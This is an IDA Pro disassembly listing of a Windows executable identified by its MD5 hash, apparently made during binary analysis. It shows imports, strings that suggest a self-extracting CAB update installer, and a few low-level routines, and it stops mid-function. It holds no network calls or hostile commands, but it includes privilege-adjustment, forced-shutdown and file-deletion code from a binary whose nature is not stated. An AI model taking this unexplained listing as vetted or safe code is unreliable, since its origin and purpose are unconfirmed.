;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : B5919931FEBDB173F81D753FCD0447D5
; File Name : u:\work\b5919931febdb173f81d753fcd0447d5_orig.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 1000000
; Section 1. (virtual address 00001000)
; Virtual size : 000055C2 ( 21954.)
; Section size in file : 00005600 ( 22016.)
; Offset to raw data for section: 00000400
; Flags 60000020: Text Executable Readable
; Alignment : default
;
; Imports from ADVAPI32.dll
;
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Externs
; _idata
; BOOL __stdcall OpenProcessToken(HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle)
extrn OpenProcessToken:dword ; CODE XREF: sub_1001FAA+4E�p
; DATA XREF: sub_1001FAA+4E�r
; BOOL __stdcall InitializeSecurityDescriptor(PSECURITY_DESCRIPTOR pSecurityDescriptor, DWORD dwRevision)
extrn InitializeSecurityDescriptor:dword ; CODE XREF: sub_100269E+7D�p
; DATA XREF: sub_100269E+7D�r
; BOOL __stdcall InitializeAcl(PACL pAcl, DWORD nAclLength, DWORD dwAclRevision)
extrn InitializeAcl:dword ; CODE XREF: sub_100269E+95�p
; DATA XREF: sub_100269E+95�r
; BOOL __stdcall AddAccessAllowedAce(PACL pAcl, DWORD dwAceRevision, DWORD AccessMask, PSID pSid)
extrn AddAccessAllowedAce:dword ; CODE XREF: sub_100269E+B7�p
; sub_100269E+CA�p ...
; BOOL __stdcall SetSecurityDescriptorDacl(PSECURITY_DESCRIPTOR pSecurityDescriptor, BOOL bDaclPresent, PACL pDacl, BOOL bDaclDefaulted)
extrn SetSecurityDescriptorDacl:dword ; CODE XREF: sub_100269E+F2�p
; DATA XREF: sub_100269E+F2�r
; BOOL __stdcall CryptAcquireContextA(HCRYPTPROV *phProv, LPCSTR szContainer, LPCSTR szProvider, DWORD dwProvType, DWORD dwFlags)
extrn CryptAcquireContextA:dword ; CODE XREF: sub_100269E+259�p
; DATA XREF: sub_100269E+259�r
; BOOL __stdcall InitiateSystemShutdownA(LPSTR lpMachineName, LPSTR lpMessage, DWORD dwTimeout, BOOL bForceAppsClosed, BOOL bRebootAfterShutdown)
extrn InitiateSystemShutdownA:dword ; CODE XREF: sub_1001D83+AF�p
; DATA XREF: sub_1001D83+AF�r
; DWORD __stdcall GetLengthSid(PSID pSid)
extrn GetLengthSid:dword ; CODE XREF: sub_1001FAA+8D�p
; sub_1001FAA+DC�p
; DATA XREF: ...
; BOOL __stdcall GetTokenInformation(HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, LPVOID TokenInformation, DWORD TokenInformationLength, PDWORD ReturnLength)
extrn GetTokenInformation:dword ; CODE XREF: sub_1001FAA+7A�p
; sub_1001FAA+D0�p
; DATA XREF: ...
; BOOL __stdcall AllocateAndInitializeSid(PSID_IDENTIFIER_AUTHORITY pIdentifierAuthority, BYTE nSubAuthorityCount, DWORD nSubAuthority0, DWORD nSubAuthority1, DWORD nSubAuthority2, DWORD nSubAuthority3, DWORD nSubAuthority4, DWORD nSubAuthority5, DWORD nSubAuthority6, DWORD nSubAuthority7, PSID *pSid)
extrn AllocateAndInitializeSid:dword ; CODE XREF: sub_1001FAA+37�p
; DATA XREF: sub_1001FAA+37�r
; BOOL __stdcall CryptReleaseContext(HCRYPTPROV hProv, ULONG_PTR dwFlags)
extrn CryptReleaseContext:dword ; CODE XREF: sub_100269E+313�p
; DATA XREF: sub_100269E+313�r
; BOOL __stdcall CryptGenRandom(HCRYPTPROV hProv, DWORD dwLen, BYTE *pbBuffer)
extrn CryptGenRandom:dword ; CODE XREF: sub_100269E+27C�p
; DATA XREF: sub_100269E+27C�r
;
; Imports from COMCTL32.dll
;
; void __stdcall InitCommonControls()
extrn InitCommonControls:dword ; CODE XREF: start_0+30�p
; DATA XREF: start_0+30�r
;
; Imports from KERNEL32.dll
;
; HANDLE __stdcall CreateEventA(LPSECURITY_ATTRIBUTES lpEventAttributes, BOOL bManualReset, BOOL bInitialState, LPCSTR lpName)
extrn CreateEventA:dword ; CODE XREF: start_0+7C�p
; DATA XREF: start_0+7C�r
; HANDLE __stdcall GetProcessHeap()
extrn GetProcessHeap:dword ; CODE XREF: start_0+36�p
; DATA XREF: start_0+36�r
; BOOL __stdcall GetVersionExA(LPOSVERSIONINFOA lpVersionInformation)
extrn GetVersionExA:dword ; CODE XREF: sub_1001D83+D0�p
; sub_1001D83+E3�p
; DATA XREF: ...
; BOOL __stdcall ReadFile(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped)
extrn ReadFile:dword ; CODE XREF: sub_10013BC+32�p
; sub_100180D+4C�p ...
; DWORD __stdcall SetFilePointer(HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod)
extrn SetFilePointer:dword ; CODE XREF: sub_10013BC+16�p
; sub_10014E0+1E�p ...
; BOOL __stdcall HeapFree(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem)
extrn HeapFree:dword ; CODE XREF: sub_10014AE+C�p
; DATA XREF: sub_10014AE+C�r
; BOOL __stdcall CloseHandle(HANDLE hObject)
extrn CloseHandle:dword ; CODE XREF: sub_10014C1+6�p
; sub_10015BE+1B�p ...
; DWORD __stdcall FormatMessageA(DWORD dwFlags, LPCVOID lpSource, DWORD dwMessageId, DWORD dwLanguageId, LPSTR lpBuffer, DWORD nSize, va_list *Arguments)
extrn FormatMessageA:dword ; CODE XREF: sub_1001556+50�p
; DATA XREF: sub_1001556+50�r
; void __stdcall LeaveCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn LeaveCriticalSection:dword ; CODE XREF: sub_10015BE+F1�p
; DATA XREF: sub_10015BE+F1�r
; BOOL __stdcall RemoveDirectoryA(LPCSTR lpPathName)
extrn RemoveDirectoryA:dword ; CODE XREF: sub_10015BE+88�p
; sub_10015BE+CF�p
; DATA XREF: ...
; DWORD __stdcall GetLastError()
extrn GetLastError:dword ; CODE XREF: sub_10015BE+4C�p
; sub_10015BE+8E�p ...
; BOOL __stdcall DeleteFileA(LPCSTR lpFileName)
extrn DeleteFileA:dword ; CODE XREF: sub_10015BE+42�p
; DATA XREF: sub_10015BE+42�r
; BOOL __stdcall MoveFileExA(LPCSTR lpExistingFileName, LPCSTR lpNewFileName, DWORD dwFlags)
extrn MoveFileExA:dword ; CODE XREF: sub_10015BE+62�p
; sub_10015BE+A5�p ...
; void __stdcall EnterCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn EnterCriticalSection:dword ; CODE XREF: sub_10015BE+9�p
; DATA XREF: sub_10015BE+9�r
; BOOL __stdcall TerminateProcess(HANDLE hProcess, UINT uExitCode)
extrn TerminateProcess:dword ; CODE XREF: sub_10016BA+67�p
; DATA XREF: sub_10016BA+67�r
; BOOL __stdcall SetEvent(HANDLE hEvent)
extrn SetEvent:dword ; CODE XREF: sub_10016BA+48�p
; DATA XREF: sub_10016BA+48�r
; void __stdcall Sleep(DWORD dwMilliseconds)
extrn Sleep:dword ; CODE XREF: sub_10016BA+3C�p
; sub_1001D83:loc_1001DD6�p ...
; BOOL __stdcall SetEnvironmentVariableA(LPCSTR lpName, LPCSTR lpValue)
extrn SetEnvironmentVariableA:dword ; CODE XREF: sub_100180D+2F0�p
; sub_1001BF1+A8�p ...
; DWORD __stdcall GetEnvironmentVariableA(LPCSTR lpName, LPSTR lpBuffer, DWORD nSize)
extrn GetEnvironmentVariableA:dword ; CODE XREF: sub_100180D+2A2�p
; sub_1001BF1+B�p
; DATA XREF: ...
; int __stdcall WideCharToMultiByte(UINT CodePage, DWORD dwFlags, LPCWSTR lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, LPCSTR lpDefaultChar, LPBOOL lpUsedDefaultChar)
extrn WideCharToMultiByte:dword ; CODE XREF: sub_100180D+268�p
; sub_100180D+29B�p ...
; LPVOID __stdcall HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes)
extrn HeapAlloc:dword ; CODE XREF: sub_100180D+F3�p
; sub_100180D+283�p ...
; HANDLE __stdcall CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile)
extrn CreateFileA:dword ; CODE XREF: sub_100180D+1F�p
; sub_1001BF1+41�p ...
; BOOL __stdcall WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped)
extrn WriteFile:dword ; CODE XREF: sub_1001BF1+91�p
; sub_1001F82+12�p
; DATA XREF: ...
; void __stdcall ExitProcess(UINT uExitCode)
extrn ExitProcess:dword ; CODE XREF: sub_1001CB9+97�p
; start_0+52F�p
; DATA XREF: ...
; void __stdcall DeleteCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn DeleteCriticalSection:dword ; CODE XREF: sub_1001CB9+89�p
; start_0+51F�p
; DATA XREF: ...
; BOOL __stdcall FreeLibrary(HMODULE hLibModule)
extrn FreeLibrary:dword ; CODE XREF: sub_1001D83+15F�p
; DATA XREF: sub_1001D83+15F�r
; BOOL __stdcall FlushFileBuffers(HANDLE hFile)
extrn FlushFileBuffers:dword ; CODE XREF: sub_1001D83+13A�p
; DATA XREF: sub_1001D83+13A�r
; UINT __stdcall GetSystemDirectoryA(LPSTR lpBuffer, UINT uSize)
extrn GetSystemDirectoryA:dword ; CODE XREF: sub_1001D83+F7�p
; sub_100269E+12F�p
; DATA XREF: ...
; HANDLE __stdcall CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId)
extrn CreateThread:dword ; CODE XREF: start_0+95�p
; DATA XREF: start_0+95�r
; FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
extrn GetProcAddress:dword ; CODE XREF: sub_1001D83+8A�p
; sub_10025EA+8A�p
; DATA XREF: ...
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn LoadLibraryA:dword ; CODE XREF: sub_1001D83+77�p
; sub_10025EA+7A�p
; DATA XREF: ...
; DWORD __stdcall WaitForSingleObject(HANDLE hHandle, DWORD dwMilliseconds)
extrn WaitForSingleObject:dword ; CODE XREF: sub_1001D83+33�p
; start_0+AB�p ...
; HANDLE __stdcall OpenEventA(DWORD dwDesiredAccess, BOOL bInheritHandle, LPCSTR lpName)
extrn OpenEventA:dword ; CODE XREF: sub_1001D83+21�p
; DATA XREF: sub_1001D83+21�r
; HANDLE __stdcall GetCurrentProcess()
extrn GetCurrentProcess:dword ; CODE XREF: sub_1001FAA+47�p
; DATA XREF: sub_1001FAA+47�r
; DWORD __stdcall GetFileAttributesA(LPCSTR lpFileName)
extrn GetFileAttributesA:dword ; CODE XREF: sub_1002272+21E�p
; sub_10025EA+66�p
; DATA XREF: ...
; LPSTR __stdcall GetCommandLineA()
extrn GetCommandLineA:dword ; CODE XREF: sub_1002272+50�p
; DATA XREF: sub_1002272+50�r
; DWORD __stdcall GetModuleFileNameA(HMODULE hModule, LPCH lpFilename, DWORD nSize)
extrn GetModuleFileNameA:dword ; CODE XREF: sub_1002272+15�p
; DATA XREF: sub_1002272+15�r
; BOOL __stdcall CreateDirectoryA(LPCSTR lpPathName, LPSECURITY_ATTRIBUTES lpSecurityAttributes)
extrn CreateDirectoryA:dword ; CODE XREF: sub_1002596+26�p
; DATA XREF: sub_1002596+26�r
; BOOL __stdcall SystemTimeToFileTime(const SYSTEMTIME *lpSystemTime, LPFILETIME lpFileTime)
extrn SystemTimeToFileTime:dword ; CODE XREF: sub_100269E+343�p
; DATA XREF: sub_100269E+343�r
; void __stdcall GetSystemTime(LPSYSTEMTIME lpSystemTime)
extrn GetSystemTime:dword ; CODE XREF: sub_100269E+335�p
; DATA XREF: sub_100269E+335�r
; BOOL __stdcall GetDiskFreeSpaceA(LPCSTR lpRootPathName, LPDWORD lpSectorsPerCluster, LPDWORD lpBytesPerSector, LPDWORD lpNumberOfFreeClusters, LPDWORD lpTotalNumberOfClusters)
extrn GetDiskFreeSpaceA:dword ; CODE XREF: sub_100269E+1C4�p
; DATA XREF: sub_100269E+1C4�r
; DWORD __stdcall QueryDosDeviceA(LPCSTR lpDeviceName, LPSTR lpTargetPath, DWORD ucchMax)
extrn QueryDosDeviceA:dword ; CODE XREF: sub_100269E+17C�p
; DATA XREF: sub_100269E+17C�r
; UINT __stdcall GetDriveTypeA(LPCSTR lpRootPathName)
extrn GetDriveTypeA:dword ; CODE XREF: sub_100269E+14D�p
; DATA XREF: sub_100269E+14D�r
; DWORD __stdcall GetCurrentDirectoryA(DWORD nBufferLength, LPSTR lpBuffer)
extrn GetCurrentDirectoryA:dword ; CODE XREF: sub_100269E+11A�p
; DATA XREF: sub_100269E+11A�r
; BOOL __stdcall SetFileTime(HANDLE hFile, const FILETIME *lpCreationTime, const FILETIME *lpLastAccessTime, const FILETIME *lpLastWriteTime)
extrn SetFileTime:dword ; CODE XREF: sub_1002AE1+62�p
; DATA XREF: sub_1002AE1+62�r
; BOOL __stdcall LocalFileTimeToFileTime(const FILETIME *lpLocalFileTime, LPFILETIME lpFileTime)
extrn LocalFileTimeToFileTime:dword ; CODE XREF: sub_1002AE1+4D�p
; DATA XREF: sub_1002AE1+4D�r
; BOOL __stdcall DosDateTimeToFileTime(WORD wFatDate, WORD wFatTime, LPFILETIME lpFileTime)
extrn DosDateTimeToFileTime:dword ; CODE XREF: sub_1002AE1+3F�p
; DATA XREF: sub_1002AE1+3F�r
; BOOL __stdcall GetExitCodeProcess(HANDLE hProcess, LPDWORD lpExitCode)
extrn GetExitCodeProcess:dword ; CODE XREF: start_0+457�p
; DATA XREF: start_0+457�r
; BOOL __stdcall CreateProcessA(LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation)
extrn CreateProcessA:dword ; CODE XREF: start_0+410�p
; DATA XREF: start_0+410�r
; BOOL __stdcall InitializeCriticalSectionAndSpinCount(LPCRITICAL_SECTION lpCriticalSection, DWORD dwSpinCount)
extrn InitializeCriticalSectionAndSpinCount:dword ; CODE XREF: start_0+21�p
; DATA XREF: start_0+21�r
;
; Imports from SHELL32.dll
;
; LPITEMIDLIST __stdcall SHBrowseForFolderA(LPBROWSEINFOA lpbi)
extrn SHBrowseForFolderA:dword ; CODE XREF: DialogFunc+95�p
; DATA XREF: DialogFunc+95�r
; BOOL __stdcall SHGetPathFromIDListA(LPCITEMIDLIST pidl, LPSTR pszPath)
extrn SHGetPathFromIDListA:dword ; CODE XREF: DialogFunc+A7�p
; DATA XREF: DialogFunc+A7�r
;
; Imports from USER32.dll
;
; INT_PTR __stdcall DialogBoxParamA(HINSTANCE hInstance, LPCSTR lpTemplateName, HWND hWndParent, DLGPROC lpDialogFunc, LPARAM dwInitParam)
extrn DialogBoxParamA:dword ; CODE XREF: StartAddress+11�p
; sub_100269E+3BC�p
; DATA XREF: ...
; int __stdcall LoadStringA(HINSTANCE hInstance, UINT uID, LPSTR lpBuffer, int cchBufferMax)
extrn LoadStringA:dword ; CODE XREF: sub_1001556+1F�p
; sub_1001CB9+4F�p ...
; BOOL __stdcall EndDialog(HWND hDlg, INT_PTR nResult)
extrn EndDialog:dword ; CODE XREF: sub_10016BA+7F�p
; DialogFunc+165�p
; DATA XREF: ...
; HWND __stdcall SetParent(HWND hWndChild, HWND hWndNewParent)
extrn SetParent:dword ; CODE XREF: sub_10016BA+2C�p
; start_0+F6�p
; DATA XREF: ...
; int __stdcall MessageBoxA(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType)
extrn MessageBoxA:dword ; CODE XREF: sub_1001CB9+6B�p
; start_0+4B7�p
; DATA XREF: ...
; LRESULT __stdcall SendMessageA(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
extrn SendMessageA:dword ; CODE XREF: DialogFunc+C9�p
; DialogFunc+132�p
; DATA XREF: ...
; LRESULT __stdcall SendDlgItemMessageA(HWND hDlg, int nIDDlgItem, UINT Msg, WPARAM wParam, LPARAM lParam)
extrn SendDlgItemMessageA:dword ; CODE XREF: DialogFunc+BE�p
; DialogFunc+F1�p ...
; BOOL __stdcall ShowWindow(HWND hWnd, int nCmdShow)
extrn ShowWindow:dword ; CODE XREF: start_0+E4�p start_0+22F�p ...
;
; Imports from msvcrt.dll
;
; char *__cdecl strchr(const char *Str, int Val)
extrn strchr:dword ; CODE XREF: sub_1001D83+10A�p
; DATA XREF: sub_1001D83+10A�r
; int sprintf(char *Dest, const char *Format, ...)
extrn sprintf:dword ; CODE XREF: sub_100269E+290�p
; sub_100269E+2BA�p
; DATA XREF: ...
; char *__cdecl strstr(const char *Str, const char *SubStr)
extrn strstr:dword ; CODE XREF: sub_100269E+1A4�p
; sub_1002AE1+123�p ...
; char *__cdecl strlwr(char *Str)
extrn _strlwr:dword ; CODE XREF: sub_100269E+19C�p
; DATA XREF: sub_100269E+19C�r
; char *__cdecl strncpy(char *Dest, const char *Source, size_t Count)
extrn strncpy:dword ; CODE XREF: sub_100269E+15F�p
; DATA XREF: sub_100269E+15F�r
;
; Imports from ntdll.dll
;
extrn NtShutdownSystem:dword ; CODE XREF: sub_1001D83+14F�p
; DATA XREF: sub_1001D83+14F�r
extrn NtOpenProcessToken:dword ; CODE XREF: sub_1001B1C+38�p
; sub_1001BA0+14�p
; DATA XREF: ...
extrn NtAdjustPrivilegesToken:dword ; CODE XREF: sub_1001B1C+5F�p
; sub_1001BA0+28�p
; DATA XREF: ...
extrn NtClose:dword ; CODE XREF: sub_1001B1C+6C�p
; sub_1001B1C:loc_1001B93�p ...
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 1001160h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dd 5 dup(0)
dd 3E6FAE9Dh, 0
dd 2, 0
dd 13A0h, 0
dword_100118C dd 0A80E9DC0h, 11D2D910h, 10000595h, 15B1AA5Ahdword_100119C dd 0 ; sub_1002272:loc_1002390�o ...
dword_10011A0 dd 74687324h, 246E7764h, 7165722Eh, 0; char Name[]
Name db '_SFX_CAB_SHUTDOWN_REQUEST',0 ; DATA XREF: sub_1001BF1+6�o
; sub_1001BF1+A3�o
align 4
; char ProcName[]
ProcName db 'InitiateSystemShutdownExA',0 ; DATA XREF: sub_1001D83+84�o
align 4
; char LibFileName[]
LibFileName db 'advapi32.dll',0 ; DATA XREF: sub_1001D83+72�o
; sub_10025EA+75�o
align 4
; char aWfp_idle_trigg[]
aWfp_idle_trigg db 'WFP_IDLE_TRIGGER',0 ; DATA XREF: sub_1001D83+D�o
align 4
; char aDecryptfilea[]
aDecryptfilea db 'DecryptFileA',0 ; DATA XREF: sub_10025EA+84�o
align 4
aTempExt db 'temp\ext',0 ; DATA XREF: sub_100269E+321�o
align 4
; char a02x[]
a02x db '%02x',0 ; DATA XREF: sub_100269E+2B4�o
align 10h
; char Format[]
Format db '%s',0 ; DATA XREF: sub_100269E+28A�o
align 4
; char SubStr[]
SubStr db 'backofficestorage',0 ; DATA XREF: sub_100269E+196�o
align 4
; char aCdtag_1[]
aCdtag_1 db 'cdtag.1',0 ; DATA XREF: sub_1002AE1+11B�o
; char a_sfx_cab_exe_p[]
a_sfx_cab_exe_p db '_SFX_CAB_EXE_PATH',0 ; DATA XREF: start_0+387�o
align 4
; char aUpdateUpdate_e[]
aUpdateUpdate_e db '\update\update.exe',0 ; DATA XREF: start_0+374�o
align 4
byte_1001278 db 0 ; DATA XREF: sub_1004618+1D�r
; sub_1004C06+15C�r ...
align 4
dd 2020101h, 4040303h, 6060505h, 8080707h, 0A0A0909h, 0C0C0B0Bh
dd 0E0E0D0Dh, 10100F0Fh, 3 dup(11111111h), 111111h, 0
dword_10012B0 dd 0FFFFFFFEh ; sub_1004E5D:loc_100500E�r ...
dd 0FFFFFFFFh, 0
dword_10012BC dd 1 dd 2, 4, 6, 0Ah, 0Eh, 16h, 1Eh, 2Eh, 3Eh, 5Eh, 7Eh, 0BEh
dd 0FEh, 17Eh, 1FEh, 2FEh, 3FEh, 5FEh, 7FEh, 0BFEh, 0FFEh
dd 17FEh, 1FFEh, 2FFEh, 3FFEh, 5FFEh, 7FFEh, 0BFFEh, 0FFFEh
dd 17FFEh, 1FFFEh, 2FFFEh, 3FFFEh, 5FFFEh, 7FFFEh, 9FFFEh
dd 0BFFFEh, 0DFFFEh, 0FFFFEh, 11FFFEh, 13FFFEh, 15FFFEh
dd 17FFFEh, 19FFFEh, 1BFFFEh, 1DFFFEh, 1FFFFEh, 3020100h
dd 7060504h, 0B0A0908h, 0F0E0D0Ch
db 10h
byte_100138D db 0 ; DATA XREF: sub_100576D+1A2�r
; sub_100576D+1E2�r
dw 201h
dd 6050403h, 0A090807h, 0E0D0C0Bh, 100Fh, 3031424Eh, 0
dd 3E6FAE9Dh, 1, 63786673h, 702E6261h, 6264h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10013BC proc near ; CODE XREF: start_0+46F�p
NumberOfBytesRead= dword ptr -4
push ebp
mov ebp, esp
push ecx
mov eax, hFile
cmp eax, 0FFFFFFFFh
jz short locret_1001449
push ebx
push esi
xor ebx, ebx
push ebx ; dwMoveMethod
push ebx ; lpDistanceToMoveHigh
push ebx ; lDistanceToMove
push eax ; hFile
call ds:SetFilePointer ; SetFilePointer
push ebx ; lpOverlapped
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
mov esi, 210h
push esi ; nNumberOfBytesToRead
push offset dword_1007440 ; lpBuffer
push hFile ; hFile
call ds:ReadFile ; ReadFile
test eax, eax
jz short loc_1001440
cmp [ebp+NumberOfBytesRead], esi
jnz short loc_1001440
cmp dword_1007440, 6E776453h
jnz short loc_1001440
test byte ptr dword_1007448+3, 80h
jnz short loc_1001447
or byte ptr dword_1007448+3, 40h
cmp dword_1007444, 10000h
mov byte_100764F, bl
jnz short loc_1001447
test dword_1007448, 3FFFFFECh
jnz short loc_1001447
and byte ptr dword_1007448+3, 0BFh
jmp short loc_1001447
; ---------------------------------------------------------------------------
loc_1001440: ; CODE XREF: sub_10013BC+3A�j
; sub_10013BC+3F�j ...
or byte ptr dword_1007448+3, 80h
loc_1001447: ; CODE XREF: sub_10013BC+54�j
; sub_10013BC+6D�j ...
pop esi
pop ebx
locret_1001449: ; CODE XREF: sub_10013BC+C�j
leave
retn
sub_10013BC endp
; =============== S U B R O U T I N E =======================================
sub_100144B proc near ; CODE XREF: sub_1001BF1+2B�p
; sub_100269E+32A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
mov esi, [esp+8+arg_0]
mov eax, esi
push edi
lea ecx, [eax+1]
loc_1001457: ; CODE XREF: sub_100144B+11�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_1001457
mov edi, [esp+0Ch+arg_8]
sub eax, ecx
mov ecx, eax
shr ecx, 2
lea edx, [eax+edi]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
cmp byte ptr [edx-1], 5Ch
jz short loc_100147F
mov byte ptr [edx], 5Ch
inc edx
loc_100147F: ; CODE XREF: sub_100144B+2E�j
mov eax, [esp+0Ch+arg_4]
lea esi, [eax+1]
loc_1001486: ; CODE XREF: sub_100144B+40�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_1001486
sub eax, esi
mov esi, [esp+0Ch+arg_4]
lea ecx, [eax+1]
mov ebx, ecx
shr ecx, 2
mov edi, edx
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
pop edi
pop esi
add eax, edx
pop ebx
retn 0Ch
sub_100144B endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_10014AE(LPVOID lpMem)
sub_10014AE proc near ; DATA XREF: start_0+1DF�o
lpMem = dword ptr 4
push [esp+lpMem] ; lpMem
push 0 ; dwFlags
push hHeap ; hHeap
call ds:HeapFree
retn
sub_10014AE endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_10014C1(HANDLE hObject)
sub_10014C1 proc near ; DATA XREF: start_0+1CB�o
hObject = dword ptr 4
push esi
mov esi, [esp+4+hObject]
push esi ; hObject
call ds:CloseHandle ; CloseHandle
cmp hObject, esi
pop esi
jnz short loc_10014DD
and hObject, 0
loc_10014DD: ; CODE XREF: sub_10014C1+13�j
xor eax, eax
retn
sub_10014C1 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_10014E0(HANDLE hFile, LONG lDistanceToMove, DWORD dwMoveMethod)
sub_10014E0 proc near ; CODE XREF: start_0+1F8�p
; DATA XREF: start_0+1C6�o
hFile = dword ptr 4
lDistanceToMove = dword ptr 8
dwMoveMethod = dword ptr 0Ch
cmp [esp+dwMoveMethod], 0
mov eax, [esp+lDistanceToMove]
jnz short loc_10014F3
mov ecx, lDistanceToMove
add eax, ecx
loc_10014F3: ; CODE XREF: sub_10014E0+9�j
push [esp+dwMoveMethod] ; dwMoveMethod
push 0 ; lpDistanceToMoveHigh
push eax ; lDistanceToMove
push [esp+0Ch+hFile] ; hFile
call ds:SetFilePointer ; SetFilePointer
sub eax, lDistanceToMove
retn
sub_10014E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100150B proc near ; CODE XREF: sub_1001556+5E�p
; sub_100269E+35A�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
test eax, eax
lea ecx, [ebp+var_C]
jnz short loc_1001524
mov eax, [ebp+arg_4]
mov byte ptr [eax], 30h
inc eax
jmp short loc_100154F
; ---------------------------------------------------------------------------
loc_1001524: ; CODE XREF: sub_100150B+E�j
push esi
loc_1001525: ; CODE XREF: sub_100150B+29�j
xor edx, edx
push 0Ah
pop esi
div esi
add dl, 30h
mov [ecx], dl
inc ecx
test eax, eax
jnz short loc_1001525
lea eax, [ebp+var_C]
dec ecx
cmp ecx, eax
mov eax, [ebp+arg_4]
pop esi
jb short loc_100154F
loc_1001542: ; CODE XREF: sub_100150B+42�j
mov dl, [ecx]
mov [eax], dl
inc eax
dec ecx
lea edx, [ebp+var_C]
cmp ecx, edx
jnb short loc_1001542
loc_100154F: ; CODE XREF: sub_100150B+17�j
; sub_100150B+35�j
and byte ptr [eax], 0
leave
retn 8
sub_100150B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_1001556(UINT dwMessageId, int nSize, LPSTR lpBuffer)
sub_1001556 proc near ; CODE XREF: sub_1001CB9+32�p
Arguments = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
dwMessageId = dword ptr 8
nSize = dword ptr 0Ch
lpBuffer = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
mov esi, [ebp+dwMessageId]
test esi, 20000000h
jz short loc_100157F
push [ebp+nSize] ; cchBufferMax
push [ebp+lpBuffer] ; lpBuffer
push esi ; uID
push hInstance ; hInstance
call ds:LoadStringA ; LoadStringA
test eax, eax
jnz short loc_10015B9
loc_100157F: ; CODE XREF: sub_1001556+10�j
mov eax, dword_100776C
mov [ebp+Arguments], eax
mov eax, offset dword_100119C
mov [ebp+var_8], eax
mov [ebp+var_4], eax
lea eax, [ebp+Arguments]
push eax ; Arguments
push [ebp+nSize] ; nSize
push [ebp+lpBuffer] ; lpBuffer
push 0 ; dwLanguageId
push esi ; dwMessageId
push 0 ; lpSource
push 3000h ; dwFlags
call ds:FormatMessageA ; FormatMessageA
test eax, eax
jnz short loc_10015B9
push [ebp+lpBuffer]
push esi
call sub_100150B
loc_10015B9: ; CODE XREF: sub_1001556+27�j
; sub_1001556+58�j
pop esi
leave
retn 0Ch
sub_1001556 endp
; =============== S U B R O U T I N E =======================================
sub_10015BE proc near ; CODE XREF: sub_10016BA+56�p
; sub_1001CB9:loc_1001D2A�p ...
push ebx
push ebp
push esi
push edi
push offset CriticalSection ; lpCriticalSection
call ds:EnterCriticalSection
mov eax, hObject
xor ebp, ebp
cmp eax, ebp
jz short loc_10015E5
push eax ; hObject
call ds:CloseHandle ; CloseHandle
mov hObject, ebp
loc_10015E5: ; CODE XREF: sub_10015BE+18�j
mov esi, off_1007000
mov ebx, ds:MoveFileExA
mov edi, offset off_1007000
jmp short loc_1001627
; ---------------------------------------------------------------------------
loc_10015F8: ; CODE XREF: sub_10015BE+6B�j
mov eax, [esi+4]
cmp eax, ebp
jz short loc_1001625
push eax ; lpFileName
call ds:DeleteFileA ; DeleteFileA
test eax, eax
jnz short loc_1001622
